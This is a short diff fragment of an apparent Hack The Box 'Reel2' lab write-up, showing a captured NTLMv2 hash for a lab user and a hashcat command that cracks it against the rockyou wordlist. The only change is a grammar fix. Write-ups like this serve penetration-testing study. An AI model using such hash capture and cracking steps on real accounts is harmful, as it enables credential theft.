Kyuu-Ji/htb-write-up/reel2/write-up-reel2.md

 [HTTP] NTLMv2 Hash     : k.svensson::htb:97fb9988700e15f5:9067AC51AC1C30F8ED6739D704B2384E:0101000000000000211A864141FBD701A2(...)
 ```

-After a while the link gets clicked from the user _k.svensson_ and the NTLM hash can be tried to crack with **Hashcat**:
+After a while the link gets clicked from the user _k.svensson_ and the NTLM hash can be tried to be cracked with **Hashcat**:
 ```
 hashcat -m 5600 ksvensson.hash /usr/share/wordlists/rockyou.txt
 ```